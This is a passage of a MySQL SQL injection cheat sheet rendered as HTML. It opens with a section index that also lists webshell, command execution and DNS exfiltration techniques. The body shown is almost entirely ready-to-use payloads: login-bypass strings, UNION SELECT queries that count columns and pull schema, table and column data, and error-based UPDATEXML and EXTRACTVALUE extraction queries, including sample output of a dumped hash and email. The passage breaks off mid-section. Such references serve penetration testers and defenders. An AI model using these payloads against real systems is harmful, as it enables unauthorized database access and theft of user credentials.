<li><a href="#mysql-error-based---updatexml-function">MYSQL Error Based - UpdateXML Function</a></li>
<li><a href="#mysql-error-based---extractvalue-function">MYSQL Error Based - Extractvalue Function</a></li>
</ul>
</li>
<li><a href="#mysql-blind">MYSQL Blind</a><ul>
<li><a href="#mysql-blind-with-substring-equivalent">MYSQL Blind With Substring Equivalent</a></li>
<li><a href="#mysql-blind-using-a-conditional-statement">MYSQL Blind Using A Conditional Statement</a></li>
<li><a href="#mysql-blind-with-make_set">MYSQL Blind With MAKE_SET</a></li>
<li><a href="#mysql-blind-with-like">MYSQL Blind With LIKE</a></li>
<li><a href="#mysql-blind-with-regexp">MySQL Blind With REGEXP</a></li>
</ul>
</li>
<li><a href="#mysql-time-based">MYSQL Time Based</a><ul>
<li><a href="#using-sleep-in-a-subselect">Using SLEEP in a Subselect</a></li>
<li><a href="#using-conditional-statements">Using Conditional Statements</a></li>
</ul>
</li>
<li><a href="#mysql-dios---dump-in-one-shot">MYSQL DIOS - Dump in One Shot</a></li>
<li><a href="#mysql-current-queries">MYSQL Current Queries</a></li>
<li><a href="#mysql-read-content-of-a-file">MYSQL Read Content of a File</a></li>
<li><a href="#mysql-command-execution">MYSQL Command Execution</a><ul>
<li><a href="#shell---outfile-method">WEBSHELL - OUTFILE method</a></li>
<li><a href="#shell---dumpfile-method">WEBSHELL - DUMPFILE method</a></li>
<li><a href="#udf-library">COMMAND - UDF Library</a></li>
</ul>
</li>
<li><a href="#mysql-insert">MYSQL INSERT</a></li>
<li><a href="#mysql-truncation">MYSQL Truncation</a></li>
<li><a href="#mysql-out-of-band">MYSQL Out of Band</a><ul>
<li><a href="#dns-exfiltration">DNS Exfiltration</a></li>
<li><a href="#unc-path---ntlm-hash-stealing">UNC Path - NTLM Hash Stealing</a></li>
</ul>
</li>
<li><a href="#mysql-waf-bypass">MYSQL WAF Bypass</a><ul>
<li><a href="#alternative-to-information-schema">Alternative to Information Schema</a></li>
<li><a href="#alternative-to-version">Alternative to VERSION</a></li>
<li><a href="#alternative-to-group_concat">Alternative to GROUP_CONCAT</a></li>
<li><a href="#scientific-notation">Scientific Notation</a></li>
<li><a href="#conditional-comments">Conditional Comments</a></li>
<li><a href="#wide-byte-injection-gbk">Wide Byte Injection (GBK)</a></li>
</ul>
</li>
<li><a href="#references">References</a></li>
</ul>
<h2 id="mysql-default-databases">MYSQL Default Databases</h2>
<table>
<thead>
<tr>
<th>Name</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>mysql</td>
<td>Requires root privileges</td>
</tr>
<tr>
<td>information_schema</td>
<td>Available from version 5 and higher</td>
</tr>
</tbody>
</table>
<h2 id="mysql-comments">MYSQL Comments</h2>
<p>MySQL comments are annotations in SQL code that are ignored by the MySQL server during execution.</p>
<table>
<thead>
<tr>
<th>Type</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>#</code></td>
<td>Hash comment</td>
</tr>
<tr>
<td><code>/* MYSQL Comment */</code></td>
<td>C-style comment</td>
</tr>
<tr>
<td><code>/*! MYSQL Special SQL */</code></td>
<td>Special SQL</td>
</tr>
<tr>
<td><code>/*!32302 10*/</code></td>
<td>Comment for MYSQL version 3.23.02</td>
</tr>
<tr>
<td><code>--</code></td>
<td>SQL comment</td>
</tr>
<tr>
<td><code>;%00</code></td>
<td>Nullbyte</td>
</tr>
<tr>
<td>`</td>
<td>Backtick</td>
</tr>
</tbody>
</table>
<h2 id="mysql-testing-injection">MYSQL Testing Injection</h2>
<ul>
<li>
<p><strong>Strings</strong>: Query like <code>SELECT * FROM Table WHERE id = 'FUZZ';</code>
<div class="highlight"><pre><span></span><code><a id="__codelineno-0-1" name="__codelineno-0-1" href="#__codelineno-0-1"></a>&#39; False
<a id="__codelineno-0-2" name="__codelineno-0-2" href="#__codelineno-0-2"></a>&#39;&#39; True
<a id="__codelineno-0-3" name="__codelineno-0-3" href="#__codelineno-0-3"></a>&quot; False
<a id="__codelineno-0-4" name="__codelineno-0-4" href="#__codelineno-0-4"></a>&quot;&quot; True
<a id="__codelineno-0-5" name="__codelineno-0-5" href="#__codelineno-0-5"></a>\ False
<a id="__codelineno-0-6" name="__codelineno-0-6" href="#__codelineno-0-6"></a>\\ True
</code></pre></div></p>
</li>
<li>
<p><strong>Numeric</strong>: Query like <code>SELECT * FROM Table WHERE id = FUZZ;</code>
<div class="highlight"><pre><span></span><code><a id="__codelineno-1-1" name="__codelineno-1-1" href="#__codelineno-1-1"></a><span class="n">AND</span> <span class="n">1</span> <span class="n">True</span>
<a id="__codelineno-1-2" name="__codelineno-1-2" href="#__codelineno-1-2"></a><span class="n">AND</span> <span class="n">0</span> <span class="n">False</span>
<a id="__codelineno-1-3" name="__codelineno-1-3" href="#__codelineno-1-3"></a><span class="n">AND</span> <span class="n">true</span> <span class="n">True</span>
<a id="__codelineno-1-4" name="__codelineno-1-4" href="#__codelineno-1-4"></a><span class="n">AND</span> <span class="n">false</span> <span class="n">False</span>
<a id="__codelineno-1-5" name="__codelineno-1-5" href="#__codelineno-1-5"></a><span class="n">1-false</span> <span class="n">Returns</span> <span class="n">1</span> <span class="k">if</span> <span class="n">vulnerable</span>
<a id="__codelineno-1-6" name="__codelineno-1-6" href="#__codelineno-1-6"></a><span class="n">1-true</span> <span class="n">Returns</span> <span class="n">0</span> <span class="k">if</span> <span class="n">vulnerable</span>
<a id="__codelineno-1-7" name="__codelineno-1-7" href="#__codelineno-1-7"></a><span class="n">1</span><span class="p">*</span><span class="n">56</span> <span class="n">Returns</span> <span class="n">56</span> <span class="k">if</span> <span class="n">vulnerable</span>
<a id="__codelineno-1-8" name="__codelineno-1-8" href="#__codelineno-1-8"></a><span class="n">1</span><span class="p">*</span><span class="n">56</span> <span class="n">Returns</span> <span class="n">1</span> <span class="k">if</span> <span class="n">not</span> <span class="n">vulnerable</span>
</code></pre></div></p>
</li>
<li>
<p><strong>Login</strong>: Query like <code>SELECT * FROM Users WHERE username = 'FUZZ1' AND password = 'FUZZ2';</code>
<div class="highlight"><pre><span></span><code><a id="__codelineno-2-1" name="__codelineno-2-1" href="#__codelineno-2-1"></a><span class="s1">&#39; OR &#39;</span><span class="n">1</span>
<a id="__codelineno-2-2" name="__codelineno-2-2" href="#__codelineno-2-2"></a><span class="s1">&#39; OR 1 -- -</span>
<a id="__codelineno-2-3" name="__codelineno-2-3" href="#__codelineno-2-3"></a><span class="s1">&quot; OR &quot;&quot; = &quot;</span>
<a id="__codelineno-2-4" name="__codelineno-2-4" href="#__codelineno-2-4"></a><span class="s1">&quot; OR 1 = 1 -- -</span>
<a id="__codelineno-2-5" name="__codelineno-2-5" href="#__codelineno-2-5"></a><span class="s1">&#39;</span><span class="p">=</span><span class="s1">&#39;</span>
<a id="__codelineno-2-6" name="__codelineno-2-6" href="#__codelineno-2-6"></a><span class="s1">&#39;</span><span class="n">LIKE</span><span class="s1">&#39;</span>
<a id="__codelineno-2-7" name="__codelineno-2-7" href="#__codelineno-2-7"></a><span class="s1">&#39;</span><span class="p">=</span><span class="n">0</span><span class="p">--+</span>
</code></pre></div></p>
</li>
</ul>
<h2 id="mysql-union-based">MYSQL Union Based</h2>
<h3 id="detect-columns-number">Detect Columns Number</h3>
<p>To successfully perform a union-based SQL injection, an attacker needs to know the number of columns in the original query.</p>
<h4 id="iterative-null-method">Iterative NULL Method</h4>
<p>Systematically increase the number of columns in the <code>UNION SELECT</code> statement until the payload executes without errors or produces a visible change. Each iteration checks the compatibility of the column count.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-3-1" name="__codelineno-3-1" href="#__codelineno-3-1"></a><span class="k">UNION</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="k">NULL</span><span class="p">;</span><span class="c1">--</span>
<a id="__codelineno-3-2" name="__codelineno-3-2" href="#__codelineno-3-2"></a><span class="k">UNION</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="k">NULL</span><span class="p">,</span><span class="w"> </span><span class="k">NULL</span><span class="p">;</span><span class="c1">-- </span>
<a id="__codelineno-3-3" name="__codelineno-3-3" href="#__codelineno-3-3"></a><span class="k">UNION</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="k">NULL</span><span class="p">,</span><span class="w"> </span><span class="k">NULL</span><span class="p">,</span><span class="w"> </span><span class="k">NULL</span><span class="p">;</span><span class="c1">-- </span>
</code></pre></div>
<h4 id="order-by-method">ORDER BY Method</h4>
<p>Keep incrementing the number until you get a <code>False</code> response. Even though <code>GROUP BY</code> and <code>ORDER BY</code> have different functionality in SQL, they both can be used in the exact same fashion to determine the number of columns in the query.</p>
<table>
<thead>
<tr>
<th>ORDER BY</th>
<th>GROUP BY</th>
<th>Result</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>ORDER BY 1--+</code></td>
<td><code>GROUP BY 1--+</code></td>
<td>True</td>
</tr>
<tr>
<td><code>ORDER BY 2--+</code></td>
<td><code>GROUP BY 2--+</code></td>
<td>True</td>
</tr>
<tr>
<td><code>ORDER BY 3--+</code></td>
<td><code>GROUP BY 3--+</code></td>
<td>True</td>
</tr>
<tr>
<td><code>ORDER BY 4--+</code></td>
<td><code>GROUP BY 4--+</code></td>
<td>False</td>
</tr>
</tbody>
</table>
<p>Since the result is false for <code>ORDER BY 4</code>, it means the SQL query is only having 3 columns.
In the <code>UNION</code> based SQL injection, you can <code>SELECT</code> arbitrary data to display on the page: <code>-1' UNION SELECT 1,2,3--+</code>.</p>
<p>Similar to the previous method, we can check the number of columns with one request if error showing is enabled.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-4-1" name="__codelineno-4-1" href="#__codelineno-4-1"></a><span class="k">ORDER</span><span class="w"> </span><span class="k">BY</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="mi">3</span><span class="p">,</span><span class="mi">4</span><span class="p">,</span><span class="mi">5</span><span class="p">,</span><span class="mi">6</span><span class="p">,</span><span class="mi">7</span><span class="p">,</span><span class="mi">8</span><span class="p">,</span><span class="mi">9</span><span class="p">,</span><span class="mi">10</span><span class="p">,</span><span class="mi">11</span><span class="p">,</span><span class="mi">12</span><span class="p">,</span><span class="mi">13</span><span class="p">,</span><span class="mi">14</span><span class="p">,</span><span class="mi">15</span><span class="p">,</span><span class="mi">16</span><span class="p">,</span><span class="mi">17</span><span class="p">,</span><span class="mi">18</span><span class="p">,</span><span class="mi">19</span><span class="p">,</span><span class="mi">20</span><span class="p">,</span><span class="mi">21</span><span class="p">,</span><span class="mi">22</span><span class="p">,</span><span class="mi">23</span><span class="p">,</span><span class="mi">24</span><span class="p">,</span><span class="mi">25</span><span class="p">,</span><span class="mi">26</span><span class="p">,</span><span class="mi">27</span><span class="p">,</span><span class="mi">28</span><span class="p">,</span><span class="mi">29</span><span class="p">,</span><span class="mi">30</span><span class="p">,</span><span class="mi">31</span><span class="p">,</span><span class="mi">32</span><span class="p">,</span><span class="mi">33</span><span class="p">,</span><span class="mi">34</span><span class="p">,</span><span class="mi">35</span><span class="p">,</span><span class="mi">36</span><span class="p">,</span><span class="mi">37</span><span class="p">,</span><span class="mi">38</span><span class="p">,</span><span class="mi">39</span><span class="p">,</span><span class="mi">40</span><span class="p">,</span><span class="mi">41</span><span class="p">,</span><span class="mi">42</span><span class="p">,</span><span class="mi">43</span><span class="p">,</span><span class="mi">44</span><span class="p">,</span><span class="mi">45</span><span class="p">,</span><span class="mi">46</span><span class="p">,</span><span class="mi">47</span><span class="p">,</span><span class="mi">48</span><span class="p">,</span><span class="mi">49</span><span class="p">,</span><span class="mi">50</span><span class="p">,</span><span class="mi">51</span><span class="p">,</span><span class="mi">52</span><span class="p">,</span><span class="mi">53</span><span class="p">,</span><span class="mi">54</span><span class="p">,</span><span class="mi">55</span><span class="p">,</span><span class="mi">56</span><span class="p">,</span><span class="mi">57</span><span class="p">,</span><span class="mi">58</span><span class="p">,</span><span class="mi">59</span><span class="p">,</span><span class="mi">60</span><span class="p">,</span><span class="mi">61</span><span class="p">,</span><span class="mi">62</span><span class="p">,</span><span class="mi">63</span><span class="p">,</span><span class="mi">64</span><span class="p">,</span><span class="mi">65</span><span class="p">,</span><span class="mi">66</span><span class="p">,</span><span class="mi">67</span><span class="p">,</span><span class="mi">68</span><span class="p">,</span><span class="mi">69</span><span class="p">,</span><span class="mi">70</span><span class="p">,</span><span class="mi">71</span><span class="p">,</span><span class="mi">72</span><span class="p">,</span><span class="mi">73</span><span class="p">,</span><span class="mi">74</span><span class="p">,</span><span class="mi">75</span><span class="p">,</span><span class="mi">76</span><span class="p">,</span><span class="mi">77</span><span class="p">,</span><span class="mi">78</span><s
</code></pre></div>
<h4 id="limit-into-method">LIMIT INTO Method</h4>
<p>This method is effective when error reporting is enabled. It can help determine the number of columns in cases where the injection point occurs after a LIMIT clause. </p>
<table>
<thead>
<tr>
<th>Payload</th>
<th>Error</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>1' LIMIT 1,1 INTO @--+</code></td>
<td><code>The used SELECT statements have a different number of columns</code></td>
</tr>
<tr>
<td><code>1' LIMIT 1,1 INTO @,@--+</code></td>
<td><code>The used SELECT statements have a different number of columns</code></td>
</tr>
<tr>
<td><code>1' LIMIT 1,1 INTO @,@,@--+</code></td>
<td><code>No error means query uses 3 columns</code></td>
</tr>
</tbody>
</table>
<p>Since the result doesn't show any error it means the query uses 3 columns: <code>-1' UNION SELECT 1,2,3--+</code>.</p>
<h3 id="extract-database-with-information_schema">Extract Database With Information_Schema</h3>
<p>This query retrieves the names of all schemas (databases) on the server.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-5-1" name="__codelineno-5-1" href="#__codelineno-5-1"></a><span class="k">UNION</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="mi">3</span><span class="p">,</span><span class="mi">4</span><span class="p">,...,</span><span class="n">GROUP_CONCAT</span><span class="p">(</span><span class="mi">0</span><span class="n">x7c</span><span class="p">,</span><span class="k">schema_name</span><span class="p">,</span><span class="mi">0</span><span class="n">x7c</span><span class="p">)</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">information_schema</span><span class="p">.</span><span class="n">schemata</span>
</code></pre></div>
<p>This query retrieves the names of all tables within a specified schema (the schema name is represented by PLACEHOLDER).</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-6-1" name="__codelineno-6-1" href="#__codelineno-6-1"></a><span class="k">UNION</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="mi">3</span><span class="p">,</span><span class="mi">4</span><span class="p">,...,</span><span class="n">GROUP_CONCAT</span><span class="p">(</span><span class="mi">0</span><span class="n">x7c</span><span class="p">,</span><span class="k">table_name</span><span class="p">,</span><span class="mi">0</span><span class="n">x7C</span><span class="p">)</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">information_schema</span><span class="p">.</span><span class="n">tables</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="n">table_schema</span><span class="o">=</span><span class="n">PLACEHOLDER</span>
</code></pre></div>
<p>This query retrieves the names of all columns in a specified table.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-7-1" name="__codelineno-7-1" href="#__codelineno-7-1"></a><span class="k">UNION</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="mi">3</span><span class="p">,</span><span class="mi">4</span><span class="p">,...,</span><span class="n">GROUP_CONCAT</span><span class="p">(</span><span class="mi">0</span><span class="n">x7c</span><span class="p">,</span><span class="k">column_name</span><span class="p">,</span><span class="mi">0</span><span class="n">x7C</span><span class="p">)</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">information_schema</span><span class="p">.</span><span class="n">columns</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="k">table_name</span><span class="o">=</span><span class="p">...</span>
</code></pre></div>
<p>This query aims to retrieve data from a specific table.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-8-1" name="__codelineno-8-1" href="#__codelineno-8-1"></a><span class="k">UNION</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="mi">3</span><span class="p">,</span><span class="mi">4</span><span class="p">,...,</span><span class="n">GROUP_CONCAT</span><span class="p">(</span><span class="mi">0</span><span class="n">x7c</span><span class="p">,</span><span class="k">data</span><span class="p">,</span><span class="mi">0</span><span class="n">x7C</span><span class="p">)</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="p">...</span>
</code></pre></div>
<h3 id="extract-columns-name-without-information_schema">Extract Columns Name Without Information_Schema</h3>
<p>Method for <code>MySQL &gt;= 4.1</code>.</p>
<table>
<thead>
<tr>
<th>Payload</th>
<th>Output</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>(1)and(SELECT * from db.users)=(1)</code></td>
<td>Operand should contain <strong>4</strong> column(s)</td>
</tr>
<tr>
<td><code>1 and (1,2,3,4) = (SELECT * from db.users UNION SELECT 1,2,3,4 LIMIT 1)</code></td>
<td>Column '<strong>id</strong>' cannot be null</td>
</tr>
</tbody>
</table>
<p>Method for <code>MySQL 5</code></p>
<table>
<thead>
<tr>
<th>Payload</th>
<th>Output</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>UNION SELECT * FROM (SELECT * FROM users JOIN users b)a</code></td>
<td>Duplicate column name '<strong>id</strong>'</td>
</tr>
<tr>
<td><code>UNION SELECT * FROM (SELECT * FROM users JOIN users b USING(id))a</code></td>
<td>Duplicate column name '<strong>name</strong>'</td>
</tr>
<tr>
<td><code>UNION SELECT * FROM (SELECT * FROM users JOIN users b USING(id,name))a</code></td>
<td>Data</td>
</tr>
</tbody>
</table>
<h3 id="extract-data-without-columns-name">Extract Data Without Columns Name</h3>
<p>Extracting data from the 4th column without knowing its name.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-9-1" name="__codelineno-9-1" href="#__codelineno-9-1"></a><span class="k">SELECT</span><span class="w"> </span><span class="o">`</span><span class="mi">4</span><span class="o">`</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="mi">3</span><span class="p">,</span><span class="mi">4</span><span class="p">,</span><span class="mi">5</span><span class="p">,</span><span class="mi">6</span><span class="w"> </span><span class="k">UNION</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">USERS</span><span class="p">)</span><span class="n">DBNAME</span><span class="p">;</span>
</code></pre></div>
<p>Injection example inside the query <code>select author_id,title from posts where author_id=[INJECT_HERE]</code></p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-10-1" name="__codelineno-10-1" href="#__codelineno-10-1"></a><span class="n">MariaDB</span><span class="w"> </span><span class="p">[</span><span class="n">dummydb</span><span class="p">]</span><span class="o">&gt;</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="n">AUTHOR_ID</span><span class="p">,</span><span class="n">TITLE</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">POSTS</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="n">AUTHOR_ID</span><span class="o">=-</span><span class="mi">1</span><span class="w"> </span><span class="k">UNION</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="mi">1</span><span class="p">,(</span><span class="k">SELECT</span><span class="w"> </span><span class="n">CONCAT</span><span class="p">(</span><span class="o">`</span><span class="mi">3</span><span class="o">`</span><span class="p">,</span><span class="mi">0</span><span class="n">X3A</span><span class="p">,</span><span class="o">`</span><span class="mi">4</span><span class="o">`</span><span class="p">)</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="mi">3</span><span class="p">,</span><span class="mi">4</span><span class="p">,</span><span class="mi">5</span><span class="p">,</span><span class="mi">6</span><span class="w"> </span><span class="k">UNION</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">USERS</span><span class="p">)</span><span class="n">A</span><span class="w"> </span><span class="k">LIMIT</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">);</span>
<a id="__codelineno-10-2" name="__codelineno-10-2" href="#__codelineno-10-2"></a><span class="o">+</span><span class="c1">-----------+-----------------------------------------------------------------+</span>
<a id="__codelineno-10-3" name="__codelineno-10-3" href="#__codelineno-10-3"></a><span class="o">|</span><span class="w"> </span><span class="n">author_id</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">title</span><span class="w"> </span><span class="o">|</span>
<a id="__codelineno-10-4" name="__codelineno-10-4" href="#__codelineno-10-4"></a><span class="o">+</span><span class="c1">-----------+-----------------------------------------------------------------+</span>
<a id="__codelineno-10-5" name="__codelineno-10-5" href="#__codelineno-10-5"></a><span class="o">|</span><span class="w"> </span><span class="mi">1</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">a45d4e080fc185dfa223aea3d0c371b6cc180a37</span><span class="p">:</span><span class="n">veronica80</span><span class="o">@</span><span class="n">example</span><span class="p">.</span><span class="n">org</span><span class="w"> </span><span class="o">|</span>
<a id="__codelineno-10-6" name="__codelineno-10-6" href="#__codelineno-10-6"></a><span class="o">+</span><span class="c1">-----------+-----------------------------------------------------------------+</span>
</code></pre></div>
<h2 id="mysql-error-based">MYSQL Error Based</h2>
<table>
<thead>
<tr>
<th>Name</th>
<th>Payload</th>
</tr>
</thead>
<tbody>
<tr>
<td>GTID_SUBSET</td>
<td><code>AND GTID_SUBSET(CONCAT('~',(SELECT version()),'~'),1337) -- -</code></td>
</tr>
<tr>
<td>JSON_KEYS</td>
<td><code>AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT('~',(SELECT version()),'~')) USING utf8))) -- -</code></td>
</tr>
<tr>
<td>EXTRACTVALUE</td>
<td><code>AND EXTRACTVALUE(1337,CONCAT('.','~',(SELECT version()),'~')) -- -</code></td>
</tr>
<tr>
<td>UPDATEXML</td>
<td><code>AND UPDATEXML(1337,CONCAT('.','~',(SELECT version()),'~'),31337) -- -</code></td>
</tr>
<tr>
<td>EXP</td>
<td><code>AND EXP(~(SELECT * FROM (SELECT CONCAT('~',(SELECT version()),'~','x'))x)) -- -</code></td>
</tr>
<tr>
<td>OR</td>
<td><code>OR 1 GROUP BY CONCAT('~',(SELECT version()),'~',FLOOR(RAND(0)*2)) HAVING MIN(0) -- -</code></td>
</tr>
<tr>
<td>NAME_CONST</td>
<td><code>AND (SELECT * FROM (SELECT NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)--</code></td>
</tr>
</tbody>
</table>
<h3 id="mysql-error-based-basic">MYSQL Error Based - Basic</h3>
<p>Works with <code>MySQL &gt;= 4.1</code></p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-11-1" name="__codelineno-11-1" href="#__codelineno-11-1"></a><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="mi">1</span><span class="w"> </span><span class="k">AND</span><span class="w"> </span><span class="k">ROW</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">)</span><span class="o">&gt;</span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="k">COUNT</span><span class="p">(</span><span class="o">*</span><span class="p">),</span><span class="n">CONCAT</span><span class="p">(</span><span class="n">CONCAT</span><span class="p">(</span><span class="o">@@</span><span class="k">VERSION</span><span class="p">),</span><span class="mi">0</span><span class="n">X3A</span><span class="p">,</span><span class="n">FLOOR</span><span class="p">(</span><span class="n">RAND</span><span class="p">()</span><span class="o">*</span><span class="mi">2</span><span class="p">))</span><span class="n">X</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="mi">1</span><span class="w"> </span><span class="k">UNION</span><span class="w"> </span><span class="k">SELECT</span><span class="w"> </span><span class="mi">2</span><span class="p">)</span><span class="n">A</span><span class="w"> </span><span class="k">GROUP</span><span class="w"> </span><span class="k">BY</span><span class="w"> </span><span class="n">X</span><span class="w"> </span><span class="k">LIMIT</span><span class="w"> </span><span class="mi">1</span><span class="p">))</span>
<a id="__codelineno-11-2" name="__codelineno-11-2" href="#__codelineno-11-2"></a><span class="s1">&#39;+(SELECT 1 AND ROW(1,1)&gt;(SELECT COUNT(*),CONCAT(CONCAT(@@VERSION),0X3A,FLOOR(RAND()*2))X FROM (SELECT 1 UNION SELECT 2)A GROUP BY X LIMIT 1))+&#39;</span>
</code></pre></div>
<h3 id="mysql-error-based-updatexml-function">MYSQL Error Based - UpdateXML Function</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-12-1" name="__codelineno-12-1" href="#__codelineno-12-1"></a><span class="k">AND</span><span class="w"> </span><span class="n">updatexml</span><span class="p">(</span><span class="n">rand</span><span class="p">(),</span><span class="n">concat</span><span class="p">(</span><span class="nb">CHAR</span><span class="p">(</span><span class="mi">126</span><span class="p">),</span><span class="k">version</span><span class="p">(),</span><span class="nb">CHAR</span><span class="p">(</span><span class="mi">126</span><span class="p">)),</span><span class="k">null</span><span class="p">)</span><span class="o">-</span>
<a id="__codelineno-12-2" name="__codelineno-12-2" href="#__codelineno-12-2"></a><span class="k">AND</span><span class="w"> </span><span class="n">updatexml</span><span class="p">(</span><span class="n">rand</span><span class="p">(),</span><span class="n">concat</span><span class="p">(</span><span class="mi">0</span><span class="n">x3a</span><span class="p">,(</span><span class="k">SELECT</span><span class="w"> </span><span class="n">concat</span><span class="p">(</span><span class="nb">CHAR</span><span class="p">(</span><span class="mi">126</span><span class="p">),</span><span class="k">schema_name</span><span class="p">,</span><span class="nb">CHAR</span><span class="p">(</span><span class="mi">126</span><span class="p">))</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">information_schema</span><span class="p">.</span><span class="n">schemata</span><span class="w"> </span><span class="k">LIMIT</span><span class="w"> </span><span class="n">data_offset</span><span class="p">,</span><span class="mi">1</span><span class="p">)),</span><span class="k">null</span><span class="p">)</span><span class="c1">--</span>
<a id="__codelineno-12-3" name="__codelineno-12-3" href="#__codelineno-12-3"></a><span class="k">AND</span><span class="w"> </span><span class="n">updatexml</span><span class="p">(</span><span class="n">rand</span><span class="p">(),</span><span class="n">concat</span><span class="p">(</span><span class="mi">0</span><span class="n">x3a</span><span class="p">,(</span><span class="k">SELECT</span><span class="w"> </span><span class="n">concat</span><span class="p">(</span><span class="nb">CHAR</span><span class="p">(</span><span class="mi">126</span><span class="p">),</span><span class="k">TABLE_NAME</span><span class="p">,</span><span class="nb">CHAR</span><span class="p">(</span><span class="mi">126</span><span class="p">))</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">information_schema</span><span class="p">.</span><span class="n">TABLES</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="n">table_schema</span><span class="o">=</span><span class="n">data_column</span><span class="w"> </span><span class="k">LIMIT</span><span class="w"> </span><span class="n">data_offset</span><span class="p">,</span><span class="mi">1</span><span class="p">)),</span><span class="k">null</span><span class="p">)</span><span class="c1">--</span>
<a id="__codelineno-12-4" name="__codelineno-12-4" href="#__codelineno-12-4"></a><span class="k">AND</span><span class="w"> </span><span class="n">updatexml</span><span class="p">(</span><span class="n">rand</span><span class="p">(),</span><span class="n">concat</span><span class="p">(</span><span class="mi">0</span><span class="n">x3a</span><span class="p">,(</span><span class="k">SELECT</span><span class="w"> </span><span class="n">concat</span><span class="p">(</span><span class="nb">CHAR</span><span class="p">(</span><span class="mi">126</span><span class="p">),</span><span class="k">column_name</span><span class="p">,</span><span class="nb">CHAR</span><span class="p">(</span><span class="mi">126</span><span class="p">))</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">information_schema</span><span class="p">.</span><span class="n">columns</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="k">TABLE_NAME</span><span class="o">=</span><span class="n">data_table</span><span class="w"> </span><span class="k">LIMIT</span><span class="w"> </span><span class="n">data_offset</span><span class="p">,</span><span class="mi">1</span><span class="p">)),</span><span class="k">null</span><span class="p">)</span><span class="c1">--</span>
<a id="__codelineno-12-5" name="__codelineno-12-5" href="#__codelineno-12-5"></a><span class="k">AND</span><span class="w"> </span><span class="n">updatexml</span><span class="p">(</span><span class="n">rand</span><span class="p">(),</span><span class="n">concat</span><span class="p">(</span><span class="mi">0</span><span class="n">x3a</span><span class="p">,(</span><span class="k">SELECT</span><span class="w"> </span><span class="n">concat</span><span class="p">(</span><span class="nb">CHAR</span><span class="p">(</span><span class="mi">126</span><span class="p">),</span><span class="n">data_info</span><span class="p">,</span><span class="nb">CHAR</span><span class="p">(</span><span class="mi">126</span><span class="p">))</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">data_table</span><span class="p">.</span><span class="n">data_column</span><span class="w"> </span><span class="k">LIMIT</span><span class="w"> </span><span class="n">data_offset</span><span class="p">,</span><span class="mi">1</span><span class="p">)),</span><span class="k">null</span><span class="p">)</span><span class="c1">--</span>
</code></pre></div>
<p>Shorter to read:</p>
